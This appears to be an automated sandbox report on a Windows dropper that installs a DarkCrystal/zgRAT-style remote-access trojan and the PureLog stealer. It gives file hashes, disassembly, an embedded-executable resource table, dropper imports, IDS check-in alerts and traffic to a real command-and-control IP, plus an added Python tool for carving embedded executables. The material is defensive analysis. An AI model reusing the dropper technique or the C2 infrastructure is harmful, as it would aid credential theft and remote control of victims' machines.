SHA-256: BB6DD9570AB9AE6A8AD48E6C1B5F5282A8893FAFEBE04BD6995FE4A84C502976
SHA-512: 9FAA172FF588E8FABF730CD61BC1F1ECEF37B1CAC02D9A63364691B58002F264C2C449B67F19B492A58483A921E599E988631DF203E00406A62D152D98357381
Malicious: false
Preview: %TbVHhfzaa%%UHCW%..%AnY%"C:\bridgeMonitorDhcpCommon/webDriverintoDll.exe"%dKqAVephdvFLFzJ%

Process: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type: data
Category: dropped
Size (bytes): 253
Entropy (8bit): 5.88666447746823
Encrypted: false
SSDEEP: 6:GEvwqK+NkLzWbH1xdyrFnBaORbM5nCcc26fR1FhgTnQFKRNmiI:GbMCzWL1xdyhBaORbQCNfb3wnQAR0iI
MD5: 702E86FFF4B16185FBC8336F58FB7C37
SHA1: FC44B404441EE941444B921AAE7EA4F7A29BFCB6
SHA-256: 98492002BCF6E2AD6900D1CA22771EBF429C6415253EE3EA2AC997120CEBD2E5
SHA-512: C622BDDC6563B44303CD0B437B8D885A7526FFC53BE7073D21C5C5C50A971A005A54E6771C62E433C3B2DE88C458D017554F4D2718B138E2BCF7916DF049327F
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 3538432
Entropy (8bit): 7.811102685383502
Encrypted: false
SSDEEP: 49152:i2EAM8/6Xg6/x08VtOkxE4HfOi5nZ/Ite8eeAd9nOtgwD9sY:inblgmx0+tp+wPJuYZtggwD9
MD5: 26C2B88440A62B4CB79201E01A404BD2
SHA1: AD784AF316C9674AB5963D9F3144EAB1A41DA087
SHA-256: B36300C80EB1D3B7BA75FF58BF058D10A7D757F14A83026981477108D1F65268
SHA-512: EE00C4F8ACC8479071B2EB29BE9E9C6A21E84E330D76B00B33EA48D03972CD295719AF8A26B09F08431748941BD8433E02A2F8C118DA7398AFFB4FD08B445A31
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 63%

Process: C:\Windows\System32\w32tm.exe
File Type: ASCII text
Category: dropped
Size (bytes): 151
Entropy (8bit): 4.746300568170299
Encrypted: false
SSDEEP: 3:VLV993J+miJWEoJ8FXwUXKEhvePjFy6vo13/FFyaNvj:Vx993DEU6XPF08
MD5: 60F0CFC2418ADC0458FFE4CAD6D02FC1
SHA1: 6BEECAB0E5B6EABA628D6C452D50C2DD8C4B1EC2
SHA-256: F7E74F29A29A41F2AD1F76E96366D3AC814E4DCC0E42E1D7CDF7179C8D2E2BB8
SHA-512: 8301F2240CB3740C4F7830010D76BFCC28CB7B4DA4C4AE8C7B5A960CB701D383560176E5822614EBDCD2F9196C0EBE6035CC9D1D2CEDC028495B0B1F7382F1B2
Malicious: false
Preview: Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 08/12/2024 10:44:20..10:44:20, error: 0x80072746.10:44:26, error: 0x80072746.

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.52478186246308
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• InstallShield setup (43055/19) 0.21%
• Win32 Executable Delphi generic (14689/80) 0.07%
• Windows Screen Saver (13104/52) 0.07%
File name: gorkmTnChA.exe
File size: 9'843'712 bytes
MD5: e4e1923f51eb61ed20cbbfab84ab25b5
SHA1: f50f90821c5e40a6b5289b8a0b084f831177cbef
SHA256: 093e2a0c52459c17133b8dce76c887d8eb3588f2fdfc7b1cfb342a7225b6cdd6
SHA512: 549cab4ea639ac9a68a5df6c119bd83bf8589d6b038e75c1443f9909c42013bc0634a8dab82cdc90cd6376a29892f7a5cbed74acbb601e1dd3e5e267cf12f8c3
SSDEEP: 98304:HCnblgmx0+tp+wPJuYZtggwD9NrvLO010gIuekBbIAAvoTeU0q4ekVbu8sGL3sYr:ibptuYMgMLO0Ejc4egHsu8Y5e3km6Nso
TLSH: B2A6E021B246C837C56316B0197D9A5F8278AF321B7299CB73CC2E6E5B701C21736E67
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4020cc
Entrypoint Section: CODE
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: d59a4a699610169663a929d37c90be43

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Ch
push 00000000h
push 00000000h
dec ecx
jne 00007EFF8C7F4F3Bh
push ecx
push ebx
push esi
push edi
mov eax, 0040209Ch
call 00007EFF8C7F49B0h
xor eax, eax
push ebp
push 00402361h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
lea edx, dword ptr [ebp-14h]
mov eax, 00402378h
call 00007EFF8C7F4D89h
mov eax, dword ptr [ebp-14h]
call 00007EFF8C7F4E59h
mov edi, eax
test edi, edi
jng 00007EFF8C7F5176h
mov ebx, 00000001h
lea edx, dword ptr [ebp-20h]
mov eax, ebx
call 00007EFF8C7F4E18h
mov ecx, dword ptr [ebp-20h]
lea eax, dword ptr [ebp-1Ch]
mov edx, 00402384h
call 00007EFF8C7F45A8h
mov eax, dword ptr [ebp-1Ch]
lea edx, dword ptr [ebp-18h]
call 00007EFF8C7F4D4Dh
mov edx, dword ptr [ebp-18h]
mov eax, 00404680h
call 00007EFF8C7F4480h
lea edx, dword ptr [ebp-2Ch]
mov eax, ebx
call 00007EFF8C7F4DE6h
mov ecx, dword ptr [ebp-2Ch]
lea eax, dword ptr [ebp-28h]
mov edx, 00402390h
call 00007EFF8C7F4576h
mov eax, dword ptr [ebp-28h]
lea edx, dword ptr [ebp-24h]
call 00007EFF8C7F4D1Bh
mov edx, dword ptr [ebp-24h]
mov eax, 00404684h
call 00007EFF8C7F444Eh
lea edx, dword ptr [ebp-38h]
mov eax, ebx
call 00007EFF8C7F4DB4h
mov ecx, dword ptr [ebp-38h]
lea eax, dword ptr [ebp-34h]
mov edx, 0040239Ch
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5000 | 0x302 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9000 | 0x96110c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0x1c8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x7000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x13b8 | 0x1400 | e5913936857bed3b3b2fbac53e973471 | False | 0.6318359375 | data | 6.340990548290613 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x3000 | 0x7c | 0x200 | cef89de607e490725490a3cd679af6bb | False | 0.162109375 | Matlab v4 mat-file (little endian), numeric, rows 0, columns 4230400 | 1.1176271682252383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x4000 | 0x695 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5000 | 0x302 | 0x400 | 3d2f2fc4e279cba623217ec9de264c4f | False | 0.3876953125 | data | 3.47731642923935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x6000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x7000 | 0x18 | 0x200 | 467f29e48f3451df774e13adae5aafc2 | False | 0.05078125 | data | 0.1991075177871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x8000 | 0x1c8 | 0x200 | 9859d413c7408cb699cca05d648c2502 | False | 0.876953125 | data | 5.7832974211095225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x9000 | 0x96110c | 0x961200 | 6bfe8ee6b0c704e938b8bf00fc2d2522 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_RCDATA | 0x9294 | 0x3ae744 | PE32 executable (GUI) Intel 80386, for MS Windows | - | - | 0.4882011413574219
RT_RCDATA | 0x3b79d8 | 0x5b26a8 | PE32 executable (GUI) Intel 80386, for MS Windows | - | - | 0.40666961669921875
RT_RCDATA | 0x96a080 | 0xe | ASCII text, with no line terminators | - | - | 1.5714285714285714
RT_RCDATA | 0x96a090 | 0x1d | ASCII text, with no line terminators | - | - | 1.2758620689655173
RT_RCDATA | 0x96a0b0 | 0x1 | very short file (no magic) | - | - | 9.0
RT_RCDATA | 0x96a0b4 | 0x1 | very short file (no magic) | - | - | 9.0
RT_RCDATA | 0x96a0b8 | 0x1 | very short file (no magic) | - | - | 9.0
RT_RCDATA | 0x96a0bc | 0x1 | very short file (no magic) | - | - | 9.0
RT_RCDATA | 0x96a0c0 | 0x10 | data | - | - | 1.5
RT_RCDATA | 0x96a0d0 | 0x1 | very short file (no magic) | - | - | 9.0
RT_RCDATA | 0x96a0d4 | 0x38 | data | - | - | 1.0714285714285714
DLL | Import
kernel32.dll | GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll | WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll | SHGetFolderPathA
shell32.dll | ShellExecuteA
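The resource table lists two RT_RCDATA entries that libmagic already recognises as PE32 executables, and the import list is the matching resource-dropper chain: FindResourceA / LoadResource / LockResource / SizeofResource to reach the blob, GetTempPathA plus CreateFileA / WriteFile to land it on disk, ShellExecuteA to run it. The following Python is an added example, not code from the report, the sandbox or the sample: it carves embedded PE images out of any blob (a dumped .rsrc section, a single RCDATA resource, a memory region) by validating the MZ -> e_lfanew -> PE\0\0 chain rather than trusting a bare "MZ", walks the section table to get the carve length, and computes byte entropy on the same 0..8 scale as the report's Entropy column. build_minimal_pe is a constructed helper that fabricates a synthetic, non-runnable carrier for the demonstration; it stands in for the real sample, which is not embedded here.

```python
import math
import struct


def build_minimal_pe(payload: bytes, machine: int = 0x14C) -> bytes:
    """Constructed helper, not the analysed sample: a minimal PE32 image (MZ stub,
    PE signature, one section holding `payload`) so the carver has something to find."""
    e_lfanew = 0x40
    dos_stub = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                        # PE32 optional header size
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, 0x102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, rest zeroed
    raw_ptr = 0x200
    # Section header: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
    section = b".text\0\0\0" + struct.pack("<IIII", len(payload), 0x1000, len(payload), raw_ptr) + b"\0" * 16
    header = (dos_stub + coff + optional + section).ljust(raw_ptr, b"\0")
    return header + payload


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in 0..8, the scale of the report's Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_embedded_pe(blob: bytes):
    """Locate every PE image inside blob.

    A hit requires an 'MZ' whose e_lfanew (DWORD at +0x3C) lands on 'PE\\0\\0' within
    the blob; 'MZ' alone occurs in random data far too often. Returns
    (offset, carve_len, machine) tuples; carve_len is the end of the last section
    (PointerToRawData + SizeOfRawData) relative to the MZ, or None when the section
    table runs off the end of the blob.
    """
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and pe + 24 <= len(blob) and blob[pe:pe + 4] == b"PE\0\0":
                machine, nsec = struct.unpack_from("<HH", blob, pe + 4)
                opt_size = struct.unpack_from("<H", blob, pe + 20)[0]
                table = pe + 24 + opt_size              # first IMAGE_SECTION_HEADER
                end = 0
                for i in range(nsec):
                    hdr = table + i * 40
                    if hdr + 40 > len(blob):
                        end = None                      # truncated section table
                        break
                    raw_size, raw_ptr = struct.unpack_from("<II", blob, hdr + 16)
                    end = max(end, raw_ptr + raw_size)
                hits.append((pos, end, machine))
        pos = blob.find(b"MZ", pos + 1)
    return hits


def carve_embedded_pe(blob: bytes):
    """Bytes of each embedded image, limited to what the blob actually contains."""
    return [blob[off:] if size is None else blob[off:off + size]
            for off, size, _ in find_embedded_pe(blob)]


if __name__ == "__main__":
    # Constructed demo: an outer carrier whose section holds a second PE, the same
    # shape as the two PE32 RT_RCDATA resources in the report.
    inner = build_minimal_pe(b"A" * 64)
    carrier = build_minimal_pe(b"\0" * 0x100 + inner + b"\0" * 16)
    for off, size, machine in find_embedded_pe(carrier):
        chunk = carrier[off:off + size]
        print(f"PE at 0x{off:x}: machine=0x{machine:x} carve={size} bytes "
              f"entropy={shannon_entropy(chunk):.2f}")
```

Run it over the dumped .rsrc section or over the individual RCDATA blobs. The check that matters in triage is the pairing of the two columns: here the resources are stored as plain PE32 images, so the carve hits directly; a packed or encrypted second stage shows up instead as a large "data" resource with entropy near 8 and no MZ/PE hit, and then the dropper's resource-loading code, not a carver, is the place to look.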
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-08T15:27:00.047076+0100 | 2829202 | ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA | 1 | 192.168.2.4 | 49730 | 172.67.184.109 | 443 | TCP
2024-12-08T15:27:23.309899+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49743 | 185.246.67.73 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 8, 2024 15:26:57.537663937 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:57.537708998 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:26:57.537782907 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:57.549520016 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:57.549535036 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:26:58.768403053 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:26:58.768477917 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:58.818371058 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:58.818387985 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:26:58.818620920 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:26:58.818711042 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:58.822228909 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:26:58.867328882 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047090054 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047137976 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047156096 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047178984 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047194004 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047214031 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047221899 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047226906 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047247887 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047259092 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047282934 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047286987 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.047303915 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047334909 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047542095 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047573090 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:00.047574997 CET | 443 | 49730 | 172.67.184.109 | 192.168.2.4
Dec 8, 2024 15:27:00.048122883 CET | 49730 | 443 | 192.168.2.4 | 172.67.184.109
Dec 8, 2024 15:27:21.741293907 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:21.861030102 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:21.861154079 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:21.862191916 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:21.981498957 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:22.217119932 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:22.339502096 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.198961020 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.309899092 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.315932989 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.316003084 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.316046953 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.353552103 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.434418917 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.473545074 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.554017067 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.554075956 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.554249048 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.673609972 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.700581074 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.784945011 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.819987059 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:23.904259920 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:23.920501947 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:24.023679018 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.023690939 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.023700953 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.138971090 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.178987026 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:24.298376083 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.528738976 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:24.610380888 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.648154974 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.648231030 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.653666019 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:24.876287937 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:24.919321060 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:24.968080044 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:25.013047934 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:25.108330011 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:25.153647900 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:25.940593004 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:25.940973043 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.009692907 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.060331106 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.060344934 CET | 80 | 49743 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.060404062 CET | 49743 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.060456991 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.060688019 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.129553080 CET | 80 | 49744 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.129626036 CET | 49744 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.180046082 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.419344902 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.538743973 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.538769960 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.538779974 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.804174900 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.809640884 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.923564911 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:26.923630953 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.923719883 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.930682898 CET | 49747 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:26.972176075 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.042983055 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.050061941 CET | 80 | 49747 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.050259113 CET | 49747 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.050385952 CET | 49747 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.075246096 CET | 80 | 49745 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.075804949 CET | 49745 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.169717073 CET | 80 | 49747 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.278898001 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399382114 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399426937 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399445057 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399465084 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399477005 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399487019 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399532080 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399564981 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399594069 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399647951 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399724007 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399732113 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399761915 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399770975 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.399776936 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.399806976 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.403839111 CET | 49747 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.519000053 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.519013882 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.519037008 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.519045115 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
Dec 8, 2024 15:27:27.519068956 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.519087076 CET | 49746 | 80 | 192.168.2.4 | 185.246.67.73
Dec 8, 2024 15:27:27.519093037 CET | 80 | 49746 | 185.246.67.73 | 192.168.2.4
